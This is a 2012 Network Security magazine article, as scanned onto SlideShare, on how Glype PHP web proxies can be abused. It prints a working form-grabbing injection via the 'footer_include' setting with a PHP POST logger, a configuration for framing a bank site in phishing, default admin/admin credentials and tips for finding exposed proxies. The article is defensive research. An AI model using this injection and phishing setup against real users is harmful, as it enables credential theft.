SlideShare uma empresa Scribd logo
1 de 8
Baixar para ler offline
FEATURE
8
Network Security December 2012
Organisations also need to educate
their end users, as security is everyone’s
concern. Many data leaks caused by
insiders are due to careless, not malicious
users. Ensure that employees understand
security policies and take the proper
security precautions.
About the Author
Bill Morrow is executive chairman
and CEO at Quarri Technologies. He
has more than 20 years of business
foundation and leadership experience.
In 2006, he founded CSIdentity
Corporation, a wholesale provider of ID
theft services across the globe, and served
as CEO and chairman of the board into
2011. Previously he founded and served
as vice-chairman of the board, director
and CEO of Grande Communications.
Morrow was the 2010 Ernst & Young
Entrepreneur of the Year Award winner
for Central Texas.
References
1. Camp, Cameron. ‘The BYOD security
challenge: How scary is the iPad, tablet,
smartphone surge?’ ESET Threat Blog,
28 Feb 2012. Accessed Nov 2012.
http://blog.eset.com/2012/02/28/
sizing-up-the-byod-security-challenge.
2. Wilson, Jeff. ‘Enterprises rate
mobile device security vendors,
reveal BYOD concerns’. Infonetics.
8 Mar 2012. Accessed Nov 2012.
www.infonetics.com/pr/2012/
Enterprise-Mobile-Security-
Strategies-Survey-Highlights.asp.
3. ‘2011 Internet Security Threat
Report’. Symantec, April 2012.
Accessed Nov 2012. www.symantec.
com/threatreport.
4. ‘Mobile Device Vulnerability
Management Flagged as Top
Concern for Security Professionals
in 2012’. Tenable Network Security,
2 Apr 2012. Accessed Nov 2012.
www.tenable.com/news-events/
press-releases/2012-mobile-device-
vulnerability-management-flagged-as-
top-concern-for-se.
5. ‘2012 Confidential Documents at
Risk Study’. Ponemon Institute, 26
Jul 2012. Accessed Nov 2012. http://
info.watchdox.com/Ponemon.html.
6. ‘Survey finds nearly half of
consumers fail to upgrade software
regularly and one quarter of
consumers don’t know why to
update software’. Skype, Norton
by Symantec and Tom Tom, 23 Jul
2012. Accessed Nov 2012. http://
about.skype.com/press/2012/07/
Abusing Glype proxies: attacks,
exploits and defences
Glype is an open source proxy written in
PHP and is freely available for personal
use. It can also be licensed for commercial
use, and is available as an add-on for
Firefox as Proxilla.2 The basic idea of a
web proxy is to download requested web
pages, modify them according to a set of
proxy rules, and then forward them to the
user. By standing between the user and
the rest of the web, the proxy can provide
some anonymity to the user in addition
to other services.
Proxies can also be transformed into
attack platforms for exploitation. For
example, misconfigured proxies can
be exploited by an attacker to steal
sensitive information from users. Our
study focuses on various attacks and
the distribution of malware using
Glype proxies. We present a model
of the approach used by attackers to
transform a Glype proxy into an attack
toolkit for spreading infections. For
our experiments, we have used Glype
versions 1.1 and 1.4. We will present
details about the features of Glype
proxies that help attackers, and we will
conclude by proposing countermeasures.
Background
A number of studies have been conducted
in the past regarding the use of public
proxies as attack platforms. SANS,
a co-operative research and security
institution, conducted two studies on
the integrity of public proxies. The first,
by Powers, discussed the possibility of
malware in public proxy lists.3 The study
focused on tracking the Koobface malware
that used open ports for incoming
connections and hid operations behind
proxies through proxy lists. The other,
by Brozycki, presented techniques for
detecting proxies that provide anonymous
access and proposed methods to defend
against them using blacklisting and active
monitoring.4 A number of IDS rules
were proposed by Brozycki to prevent
users from accessing blocked content
inside a network. In this paper, we do
not cover network-level anonymisers
such as VPNs and TOR. The concept
of this paper revolves around web-based
anonymity using server-side web proxies.
The primary difference between the TOR
network and web-based proxies is that
TOR implements multi-tier (multi-layer)
Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs,
and Richard J Enbody, Michigan State University
Proxies play a critical privacy role because these are widely used for anonymous
surfing and identity cloaking on the Internet. In addition, proxies also assist
in traffic filtering, traffic management, log auditing, access policies and surfing
restricted sites. There are several types of proxies available, but the Glype HTTP
proxy is used extensively.1
FEATURE
December 2012 Network Security
9
anonymity before forwarding the traffic to
the destination, whereas web proxies have
a two-tier (single-server) architecture.5
In other words, the difference is in the
implementation of relays and routing the
traffic between endpoints.
Huang et al discussed cache-poisoning
attacks in transparent proxies using socket
Application Programming Interfaces
(APIs) in Java and Flash.6 In cache
poisoning attacks, transparent proxies
are exploited that are configured to
route traffic based on the HTTP ‘Host:’
parameter while caching at the same time.
An attacker poisons the Host: header in
the cache using a malicious Flash or Java
file that downloads the policy file from the
attacker’s server. Cache poisoning attacks
are quite common in network proxies. The
Swiss Security Team discussed the inability
of Glype proxies to hide the user’s identity
entirely.7 Its study showed how the
misconfiguration in Glype proxies can lead
to the disclosure of sensitive information.
Dissecting Glype
The primary purpose of the Glype proxy
is to provide the capability of anonymous
surfing. However, attackers can also
transform a Glype proxy into a malware
infection platform. To understand the
attacks, it is important to understand the
characteristics of Glype proxies.
To provide proxy services each URL
and each page’s internal links are encoded
using a simple, base-64 encoding. For
example, consider this URL:
hxxp://[Glype_proxy_url]/proxy/browse.
php?u=Oi8vc2NyaXB0bWFmaWEub3Jn
Lw%3D%3D&b=13&f=norefer
This contains the string
‘Oi8vc2NyaXB0bWFmaWEub3JnLw’.
A simple base-64 decoding of this string
results in ‘://scriptmafia.org’ which
shows that the URL decoding process
is simple. Care is needed to handle
special characters because the Glype
proxy follows the PHP-based encoding/
decoding mechanism in which special
characters present in variable names are
encoded to maintain compatibility with
registered global variables.
The Glype proxy can be extended using
plugins. For example, popular websites
such as Facebook, Twitter and Gmail have
separate plug-ins for the Glype proxy.
Web page processing is handled using
Glype’s ‘process.php’ page. For simplicity,
the Glype proxy injects JavaScript code
in web pages to avoid sending requests to
the process.php page using HTTP POST
requests. The Glype proxy uses HTTP
headers such as ‘Referrer:’ and ‘Location:’
for redirection purposes.
Google can be used to search for
misconfigured Glype proxies. By default,
Glype logs its activities with a log
folder in the /tmp directory (/tmp/log).
Knowing the location of the log allows
a malicious user to easily craft efficient
Google queries with Google dorks to
search for misconfigured proxies.
The Glype proxy has default credentials
{username=admin, password=admin}.
The password is hardcoded as an MD5
hash, but is susceptible to brute force
attack. For secure configurations, the
hash should be replaced. In addition,
in its default configuration, the Glype
proxy uses no cache. Listing 1 shows the
implementation of the cache module in
Glype proxy. However, it is still possible
to configure Glype proxy to send some
cache headers using session_cache_
limiter(‘private_no_expire’).
Glype proxies suffer from several
design flaws that are exploited by
attackers. Some of the issues that make
Glype proxies an effective hacker tool
are discussed below.
Logging mechanism
By design, the Glype proxy is supposed
to provide anonymity for its users.
Unfortunately, weaknesses exist that can
leak information about a user’s identity.
Since Glype is written in PHP, an attacker
can perform several modifications to
make the Glype proxy a tool for successful
execution of attacks. There are different
kinds of information that attackers
can easily steal by misconfiguring the
parameters of the Glype proxy and writing
an advanced plugin for capturing data.
Listing 2 shows the type of information
logged when the user surfs a website
through a Glype proxy. It basically captures
GET requests and provides information
about IP addresses visited.
Glype proxies also allow attackers to
extract cookies – a potentially valuable
Listing 1: Cache module in the Glype proxy
# Send no-cache headers.
function sendNoCache()
{
header( ‘Cache-Control: no-store, no-cache, must-revalidate’ );
header( ‘Cache-Control: post-check=0, pre-check=0’, false );
header( ‘Pragma: no-cache’ );
}
Listing 2: Logs in Glype Proxy
68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.
facebook.com%2F&refid=8
68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.
com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr
FEATURE
10
Network Security December 2012
source of personal information. The
Glype proxy only provides an option for
deleting cookies on the client side, not
on the server side. To provide anonymity
the cookies should be deleted completely
on both sides, but this cannot happen.
Listing 3 shows the extracted cookies of a
user who visited Facebook.
In an attempt to provide anonymity, a
Glype proxy does not log POST requests.
However, an attacker can write a plugin
to grab all POST requests. We developed
such a plugin, which we demonstrate in
the next section.
IP banning and restriction
Glype proxies provide impressive
functionality to restrict IP addresses
using the BlockScript web software.8 It
was designed to enable administrators to
restrict HTTP requests from unwanted
domains. However, this functionality is
also useful for launching targeted attacks
in which attackers target a specific set of
IP addresses and restrict others. Also, this
property can subvert the generic analysis
method of testing servers remotely. A
Glype proxy uses an IP banning module
as shown in listing 4.
In the code in listing 4, a Glype proxy
looks for IP addresses that are restricted
or blacklisted to start the verification
check. If an IP address is found in the
databases, the Glype proxy returns a
‘403 Forbidden’ response to the user.
To make it more malicious, attackers
can serve malicious web pages showing
the IP-banned message. In this way, a
user is not able to surf anonymously
and still gets infected. There are many
modifications that can be made in the
code for playing around with IP address
restrictions.
Listing 3: Cookies collected by Glype Proxy
#HttpOnly_.facebook.com TRUE / FALSE 1394475951 datr V4tbT71wsBGdD8j2XZgUBDlJ
.facebook.com TRUE / FALSE 0 lsd 1W12c
#HttpOnly_.facebook.com TRUE / FALSE 0 m_ts 1331403951
.facebook.com TRUE / FALSE 1 reg_ext_ref deleted
.facebook.com TRUE / FALSE 0 reg_fb_gate http%3A%2F%2Fm.facebook.com%2F
.facebook.com TRUE / FALSE 0 reg_fb_ref http%3A%2F%2Fm.facebook.
com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522
Listing 4: IP Banning Module
if ( empty($_SESSION[‘ip_verified’]) || $_SESSION[‘ip_verified’] != $_
SERVER[‘REMOTE_ADDR’] ) {
if (!$CONFIG[‘enable_blockscript’]) {
# Current IP matches a banned IP? true/false
$banned = false;
# Examine all IP bans
foreach ( $CONFIG[‘ip_bans’] as $ip ) {
# Is this a range or single?
if ( ($pos = strspn($ip, ‘0123456789.’)) == strlen($ip)
) {
# Just a single IP so check for a match
if ( $_SERVER[‘REMOTE_ADDR’] == $ip )
{
# Flag the match and break out the
loop
$banned = true;
break; }
# And try next IP
continue;
}
// – – – – – Redacted – – – – – //
# Is the IP address banned?
if ( $banned ) {
# Send a Forbidden header
header(‘HTTP/1.1 403 Forbidden’, true, 403);
# Print the banned page and exit!
echo loadTemplate(‘banned.page’);
exit;}
# Still here? Must be OK so save IP in session to prevent rechecking
next time
$_SESSION[‘ip_verified’] = $_SERVER[‘REMOTE_ADDR’];
FEATURE
December 2012 Network Security
11
Threat model
Examining the threat model allows us to
understand the role of the various actors
involved and how attackers exploit
the integrity of users by conducting
attacks. The model basically covers the
threats associated with end users and
administrators. Since we’re concerned
here with the Glype proxy, the attacks
are modelled around the Man-in-the-
Middle (MitM) paradigm.
during our research,
it has been noticed that Glype proxies
are configured in a very insecure way
– for example, using default or weak
passwords. This misconfiguration
allows attackers to successfully
compromise the proxy software using
brute-force attacks. The primary risk is
that attackers now exploit third-party
resources – including infrastructure,
traffic density, etc – to exploit users
at a large scale. Glype is a server-side
proxy and compromising it has serious
implications.
the Glype proxy provides
anonymity on the web. The users
are susceptible to a wide variety of
attacks. The primary target of the
attacker is to force the users to surf
Internet resources through the Glype
proxy. The users’ surfing habits
and trust play a significant role in
the execution of insidious attacks.
Information stealing, phishing, Cross-
Frame Scripting (XFS) and so on
are some of the attacks that can be
triggered easily using Glype proxy.
Since the Glype proxy is open source,
the code can be modified using inherent
features that make it a more powerful
weapon. In the next section, we discuss
some of the attacks using custom plugins.
Remember, Glype is not a client-side
proxy but it infects and modifies the
proxied web pages served to the users.
Launching attacks using
Glype
Attacks triggered using Glype proxies
are based on the concept of the Man-
in-the-Middle (MitM) paradigm. The
MitM agent reads and writes the traffic
between two end points on the network.
It is quite easy to equate the Glype proxy
with an MitM agent because the traffic
originating from the infected machine is
routed through the Glype proxy interface
before it is processed by the web server.
The attacker controls and administers
the Glype proxy interface and can easily
manipulate the requests and responses
flowing between client’s browser and the
web server. As a result, the user is served
with illegitimate and malicious content
that subverts the normal operations of
browsers. To support this theory, our
team conducted several sets of tests to
understand the impact of Glype proxy
infection at a large scale.
Data exfiltration – form
grabbing
Data exfiltration attacks are conducted
to steal sensitive information from
infected machines on the Internet. It is
easy to exfiltrate data from users who
use Glype proxies. These proxies provide
a configuration file for managing the
current run state and it appears possible
for an attacker to infect all the proxified
web pages with illegitimate content.
To test that theory, we conducted an
experiment to understand the impact
of infecting proxied webpages. We
noticed that a Glype proxy provides
certain configuration parameters that
can be used to inject malicious content
that gets rendered in all the web pages
that are proxied. This capability can be
devastating. We implemented a small
program using jQuery to grab all the
POST requests. Listing 5 provides a
different set of scripts that we used in
our tests which are described as follows:
is used to serialise the data present
in the forms. This code serialises the
data entered by the users in input
boxes in the forms and submits the
data to the malicious domain. This
code is passed as a parameter to the
‘footer_include’ configuration, and so
injects this code at the bottom of all
the proxied webpages.
that it does not send the form data
to the server but rather triggers an
alert notification. This code is used
for validating successful insertion of
scripts in the web pages.
used to handle the incoming data and
storing it in the log file for analysis.
By using the code discussed in listing 5,
it is possible to log all the POST requests
sent by the user’s browser through the
Glype proxy’s interface. The POST data
can be logged on the server side as shown
in listing 6.
Figure 1 shows the successful
execution of a script inserted in the
proxied web page. This shows that it is
very easy to inject scripts automatically
by tweaking configuration parameters in
the Glype proxy.
Cross-frame scripting
and phishing
Cross-Frame Scripting (XFS) is an
advanced attack in which an attacker
exploits the inability of web pages to
prevent themselves from being framed
in a web browser. An attacker loads the
target website in an HTML iframe or
frame and forces the JavaScript from the
primary domain to interact with the target
website that is loaded in the frame. XFS
allows the attackers to force the legitimate
user to perform rogue operations without
their knowledge. XFS can be launched
to trigger phishing attacks. To counter
this attack many websites are using anti
XFS code.9 HTML 5 has the built-in
attribute ‘sandbox’ defined as a part of an
iframe tag that can be used to bypass the
restrictions, as described here.10 Despite
this fact, a Glype proxy has the ability to
rewrite URLs while proxying the content
of the domain. A Glype proxy caches the
URL and then applies the proxify function
to rewrite it. To make it legitimate, an
attacker can configure the Glype proxy in
such a way that phishing attacks look more
original by subverting the XFS protections.
We conducted an experiment using Glype
proxy version 1.1 and made configuration
changes in the settings.php file in order
to tweak the Glype proxy to execute a
phishing attack. We also modified the code
to execute advanced attacks to understand
the potential risk associated with a Glype
proxy. Listing 7 shows the configuration
we used in the demonstration attack code.
FEATURE
12
Network Security December 2012
In our code, Secure Socket Layer
(SSL) protocol warnings are turned off.
This modification allows the Glype
proxy to quash all the SSL-based
warnings. We also enabled hotlinking,
the process of directly loading content
from a third-party domain. In a Glype
proxy, hotlinking allows the attacker to
force the user to visit an XFS web page
directly. We enabled caching for faster
execution. Caching of files such as CSS,
images, and so on forces the browser
to store the content locally and use it
directly without sending requests to
the web server. This way, the attacker
can speed up the loading of web pages
in the client’s browser. Finally, we
allowed JavaScript for communication
with different objects on the web page.
JavaScript is an essential component of
many websites and applications. For
example, banking websites use JavaScript
for communicating with different objects
in a dynamic manner. In addition,
the attacker benefits from this because
it allows the attacker to execute any
arbitrary script in the context of a proxied
website. We tested this configuration and
found that it is possible to use XFS for
conducting a phishing attack as shown in
Figure 2.
Our experiment showed that
sophisticated XFS protections can be
circumvented with the help of a Glype
proxy. In Figure 2, a legitimate Bank of
America website is framed inside a Glype
proxy interface without any warnings.
It means an attacker can inject scripts as
discussed earlier to interact with various
objects on the web page. Typically, the
user believes that he/she is surfing the
bank website through a legitimate proxy
but in reality all the information can be
easily captured from the user’s session.
“It is possible to embed a single
exploit code directly in the Glype
proxy web page. This process
actually transforms the Glype
proxy into an attack toolkit”
In the above layout, the URL points
to the domain where the Glype proxy
is hosted. As hotlinking is allowed and
the Glype proxy does not present any
message, the attacker can also use the
Glype proxy URL (pointed to bank
domain) and embed it in the phishing
emails for distributing among large
number of users. When a user clicks
the malicious link, he/she is redirected
towards the Glype proxy interface that
automatically loads the legitimate bank
website. An attacker can also install a
Listing 5: Injecting Code in Glype Proxy Parameter
// – – – – Code (1) – – – – //
$CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/
libs/jquery/1.5/jquery.min.js”></script>
<script>
$(’form’).submit( function()
{
var yup = $(’form’).serialize();
$.post(“logit.php”, yup,function (data){});
});
</script>‘;
// – – – – Code (2) – – – – //
$CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/
libs/jquery/1.5/jquery.min.js”></script>
<script>
$(’form’).submit( function()
{
alert( $(’form’).serialize());
});
</script>‘;
// – – – – Code (3) – – – – //
<?php
$file = fopen(“postlog.txt”, ‘a’);
foreach( $_POST as $key => $value )
{
fwrite($file, $key.”:”.$value.”n”);
}
fclose($file);
?>
Listing 6: Extracted Data from HTTP POST (FORM
Submit) Request
lsd:
post_form_id:7eb4ce3be4f996e756e1f54ac474d578
charset_test:€,´,€,´,水,Д,Є
version:1
ajax:1
width:1280
pxr:1
gps:1
email:FACEBOOK_USER@facebook.com
pass:FACEBOOK_PASSWORD
m_ts:1332258635
li:MqdoT8wNn91Ak0OT4rUUGUHg
FEATURE
December 2012 Network Security
13
Glype proxy on familiar-looking domain
names to make the phishing attack look
more appealing, and hence more effective.
Malware distribution
Glype proxies can be used for attacking
corporate networks to spread infections.
Considering the characteristics of a
Glype proxy, it is possible for attackers
to create an embedded toolkit using a
Glype proxy for distributing malware
that is highly targeted. The complete
model is presented below.
Hosting Glype proxy: to begin, the
attacker hosts the Glype proxy tool on
a compromised domain. As described
earlier, web searching can reveal a number
of misconfigured Glype proxies on the
Internet. It is not difficult for an attacker
to hack a misconfigured proxy and use it
for malicious purposes. Once a proxy is
successfully installed on the compromised
domain, the attacker configures it for
the attack using scenarios described in
earlier sections. There are two primary
configuration checks that an attacker
wants to implement:
attacker to keep track of the activity
happening through the proxy. For
example, an attacker can install
a custom POST logger plugin for
stealing data in HTTP POST requests.
allows the attacker to restrict certain
IP addresses from accessing the Glype
proxy. This functionality is useful in
targeted infections.
Embedding a browser exploit pack
in Glype: after successful installation of
a Glype proxy, the next step is to embed
an iframe having a URL pointing to a
Browser Exploit Pack (BEP).11 The iframe
can be hidden or obfuscated depending on
the requirements. A BEP is a framework
that has a number of exploits bundled
together. A BEP begins by fingerprinting
the user’s browser environment and then
serves an appropriate exploit. BlackHole,
Phoenix and Crimepack are some of
the BEPs that are frequently used for
infections. It is possible to embed a single
exploit code directly in the Glype proxy
web page. This process actually transforms
the Glype proxy into an attack toolkit. As
discussed earlier, malicious code can be
injected dynamically in all the proxied web
pages for stealthy infections. The main
motive behind this process is to exploit the
user’s browser when a proxied web page
is opened. Additionally, many proxy users
Figure 1: Stealing credentials by injecting code in a Glype proxy.
Listing 7: Configuration Parameters Required for
Bypassing XFS and Executing Phishing
// Configure SSL warnings
$CONFIG[‘ssl_warning’] = false;
// Managing Hotlinking
$CONFIG[‘stop_hotlinking’] = false;
// Specifying the target domain for hot linking
$CONFIG[‘hotlink_domains’] = array(‘www.bankofamerica.com’);
// Storing cookies on the server
$CONFIG[‘cookies_on_server’] = true;
// Setting cookies path
$CONFIG[‘cookies_folder’] = $CONFIG[‘tmp_dir’] . ‘cookies/’;
// Enable logging
$CONFIG[‘enable_logging’] = true;
Figure 2: Phished web page in a Glype proxy.
FEATURE
14
Network Security December 2012
believe that surfing online anonymously
provides security and neglect to verify the
integrity of the Glype proxy. An attacker
can exploit this trust. Embedding a
malicious link pointing to a BEP is not a
hard task in the Glype proxy.
Advertising Glype proxy: once the
Glype proxy-based attack is set up, the
next step is to start advertising the Glype
proxy. Advertising is usually done to
collect revenue based on hits, but in this
case the prime motivation for an attacker
is to get traffic so that the infectious
code can be distributed. However,
advertising can play a critical role in
the success of attacks. Several methods
are used by attackers to advertise their
infected Glype proxies:
to advertise their infected Glype
proxy. Public proxy lists are one of
the most widely accepted methods
for advertising Glype proxies. For
example, paying a few dollars allows an
infected Glype proxy to be numbered
in the top-ten proxies, which is a good
deal from the attacker’s perspective.
This approach can increase traffic on
the infected Glype proxy. Figure 3
shows how a proxy can be advertised.
attacks to distribute the URL pointing
to their infected Glype proxy. Phishing
attacks have been effective for
exploiting users’ trust and belief in the
security of proxies.
proxy on social networks, message
boards and advertising links. Due to
their popularity and trustworthiness,
social networks have become the
preferred choice of attackers for
distributing malware. It is easy and
profitable.
On completion of this process,
attackers have successfully distributed
information about their infected Glype
proxy to a variety of outlets on the
Internet. After this, the attacker waits for
the infections to trigger.
Post-exploitation: once the infected
proxy site has been visited, there are
two vectors of attack. If a user is to be
directed to a malicious website loaded
with malware, the BEP there installs
malware on a user’s computer and the
computer is owned by the attacker.
If the Glype is being used to gather
information, the attacker starts mining
the logs to track the IP addresses
and extract personal information,
possibly including account credentials.
Information collected from Glype
proxies can also be very useful to design
other attack vectors. For example,
information specific to an individual can
be collected for a later, more effective
spear-phishing attack. This attack model
is typically part of a distributed attack
and can be very effective in spreading
infections widely.
Proactive steps
There are several steps that users can
take when dealing with Glype proxies
for anonymous surfing on the Internet:
services for surfing websites that require
critical information, such as financial
credentials, to be delivered to the server.
Users should be aware that their data
is being transferred through a public
proxy. A classic example would be
employees circumventing restrictions
put in place by an organisation they
work for – such circumvention could
open a big hole.
legitimate and authentic proxy services
on the Internet. However, it is still not
advised to use the services directly. A
user should verify the integrity of a
proxy provider to check whether it
is a legitimate service provider or a
fraudulent entity.
for internal use, it should be ensured
that the Glype proxy is configured
in a secure way. Default credentials
must be changed to stronger ones. Log
files should not be publicly accessible,
which can be achieved by configuring
the settings.php and .htaccess files on
the server.
good surfing habits on the Internet.
For example, they should always think
twice before clicking a link that is
embedded in an email. Additionally,
they should be suspicious of
attachments and verify them before
downloading.Theseoperationalhabits
depend on the security knowledge of
the user and show the importance of
user education. Organisations should
have a robust security training model
to educate users about the latest web
attack trends and appropriate secure
behaviour.
The steps discussed above can be
effective in reducing the infection rate
and preserving the integrity of users.
Conclusion
Glype proxies have been increasing
in popularity over the past few years.
Generally, Glype proxies assist in
maintaining a user’s integrity and privacy.
However, they can also be used as an
attack platform because of some inherent
design flaws. First, insecure configuration
of Glype proxies can result in the stealing
of information. Second, attackers can
extend the Glype proxy code to conduct
Figure 3: Advertising proxies on the Internet.
FEATURE
December 2012 Network Security
15
web-based attacks by tricking a user
to visit a malicious domain or routing
the web traffic through Glype proxies.
Finally, security greatly depends on users’
ability to make secure decisions when on
the Internet. Secure behaviour can help
thwart a number of attack scenarios. Be
vigilant and surf securely.
About the authors
Aditya K Sood is a senior security
practitioner and PhD candidate at
Michigan State University. He has
already worked in the security domain
for Armorize, COSEINC and KPMG.
He is also a founder of SecNiche Security,
an independent security research lab.
He has been an active speaker at
industry conferences such as DEFCON,
HackInTheBox, LayerOne, Source, RSA,
BruCon, ToorCon, HackerHalted, TRISC,
EuSecwest, XCON, Troopers, OWASP
AppSec, US-CERT GFIRST and many
others. He has authored several papers for
various publishers including IEEE, Elsevier,
Crosstalk, Virus Bulletin, ISACA, ISSA and
HITB.
Peter Greko is a security researcher at
SecNiche Security Labs where he deals
with cyber-security issues. Previously he
has worked in the cyber-security divisions
of Sypris and Citigroup. He has spoken at
several conferences, including HackerHalted,
AppSec DC, HOPE, Swiss CyberStorm and
local OWASP and ISSA chapter meetings.
Richard J Enbody, PhD is associate
professor in the Department of Computer
Science and Engineering at Michigan
State University (US) where he joined the
faculty in 1987. He earned his PhD at
the University of Minnesota (1987) and
his BA at Carleton College (1976). His
research interests include computer security,
computer architecture, web-based distance
education, and CS1 education. Enbody
has written a CS1 text using Python: ‘The
Practice of Computing Using Python,
Second Edition’, published by Addison-
Wesley 2012.
References
1. Glype proxy. Accessed Nov 2012.
www.glype.com.
2. Proxilla Glype Proxy Client – Mozilla
Firefox Add-On. Accessed Nov 2012.
https://addons.mozilla.org/en-US/
firefox/addon/proxilla/.
3. Powers, JL. ‘Tracking Malware with
Public Proxy Lists’. SANS Reading
Room. Accessed Nov 2012. www.
sans.org/reading_room/whitepapers/
malicious/tracking-malware-public-
proxy-lists_33604.
4. Brozycki, Z. ‘Detecting and
Preventing Anonymous Proxy Usage’.
SANS Reading Room. Accessed Nov
2012. www.sans.org/reading_room/
whitepapers/detection/detecting-
preventing-anonymous-proxy-
usage_32943.
5. ‘TOR (The Onion Router)’.
University of Michigan. Accessed Nov
2012. http://webapps.lsa.umich.edu/
lsait/admin/TOR%20Routing%20
Infomation%20.pdf.
6. Huang, L; Chen, EY; Barth, A;
Rescorla, E; Jackson, C. ‘Talking to
Yourself for Fun and Profit’. Accessed
Nov 2012. www.w2spconf.com/2011/
papers/websocket.pdf.
7. ‘When You Think You Surf
Anonymously But You Don’t’. Swiss
Security Blog, 26 Apr 2010. Accessed
Nov 2012. www.abuse.ch/?p=2534.
8. BlockScript, home page. Accessed
Nov 2012. www.blockscript.com.
9. Rydstedt, G; Bursztein, E; Boneh, D;
Jackson, C. ‘Busting Frame Busting: a
Study of Clickjacking Vulnerabilities
on Popular Sites’. Stanford SecLab,
20 Jul 2010. Accessed Nov 2012.
http://seclab.stanford.edu/websec/
framebusting/framebust.pdf.
10.Sood, AK; Enbody, RJ. ‘Frametrapping
the framebusting defence’. Network
Security, October 2011. Accessed Nov
2012. www.sciencedirect.com/science/
article/pii/S1353485811701052.
11.Sood, AK; Enbody, RJ. ‘Browser
Exploit Packs – Exploitation Tactics’.
ToorCon Security Conference,
October 2011, San Diego. Accessed
Nov 2012. http://secniche.blogspot.
com/2011/06/toorcon-seattle-2011-
browser-exploit.html.
Virtual jihad: how real is
the threat?
Steve Gold
One of the less well reported aspects
of cybercrime – and one that poses
a very real threat to the integrity of
companies’ IT resources, as well as that
of Western governments – is the issue of
cyber-terrorism. According to Dancho
Danchev, an Amsterdam-based security
blogger with Webroot, and an Internet/
security researcher since the mid-1990s,
the reason for this is largely because
of a lack of understanding of what
cyber-jihadism is all about. Coupled
with a lack of understanding about the
teachings of the Koran and Islamic faith,
this has resulted in the topic becoming
something of a no-go area for Western
security researchers, despite the fact that
the more extremist elements in Islamic
countries are increasingly using relatively
advanced technology in the shape of
Steve Gold, freelance journalist
There is widespread concern about the ways in which terrorist organisations – and
particularly jihadist movements – may be using the Internet to organise and execute
acts of terror. But is the threat real, or is it a case of an IT security industry generating
fear, uncertainty and doubt in an attempt to instil fear into every Internet user?

Mais conteúdo relacionado

Mais procurados

Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationJustin Bui
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera Software[Wroclaw #9] The purge - dealing with secrets in Opera Software
[Wroclaw #9] The purge - dealing with secrets in Opera SoftwareOWASP
 
Web security for developers
Web security for developersWeb security for developers
Web security for developersSunny Neo
 
Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Kl 031.30 eng_class_setup_guide_1.2
Kl 031.30 eng_class_setup_guide_1.2Freddy Ortiz
 
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...
[CB21] ProxyLogon is Just the Tip of the Iceberg, A New Attack Surface on Mic...CODE BLUE
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Null 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNull 14 may_lesser_known_attacks_by_ninadsarang
Null 14 may_lesser_known_attacks_by_ninadsarangNinad Sarang
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Chris Gates
 
Neoito — Secure coding practices
Neoito — Secure coding practicesNeoito — Secure coding practices
Neoito — Secure coding practicesNeoito
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Introduction to Web Application Security - Blackhoodie US 2018
Introduction to Web Application Security - Blackhoodie US 2018Niranjanaa Ragupathy
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
powershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonpowershell-is-dead-epic-learnings-london
powershell-is-dead-epic-learnings-londonnettitude_labs
 
Securing Source Code on Endpoints
Securing Source Code on EndpointsSecuring Source Code on Endpoints
Securing Source Code on Endpointsthomashelsley
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
 
[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101[Wroclaw #2] iOS Security - 101
[Wroclaw #2] iOS Security - 101OWASP
 
Java Exploit Analysis .
Java Exploit Analysis .Java Exploit Analysis .
Java Exploit Analysis .Rahul Sasi
 
[Wroclaw #4] WebRTC & security: 101
[Wroclaw #4] WebRTC & security: 101[Wroclaw #4] WebRTC & security: 101
[Wroclaw #4] WebRTC & security: 101OWASP
 

Mais procurados (20)

Understanding Windows Access Token Manipulation
Understanding Windows Access Token ManipulationUnderstanding Windows Access Token Manipulation
Understanding Windows Access Token Manipulation
 
[Wroclaw #9] The purge - dealing with secrets in Opera Software
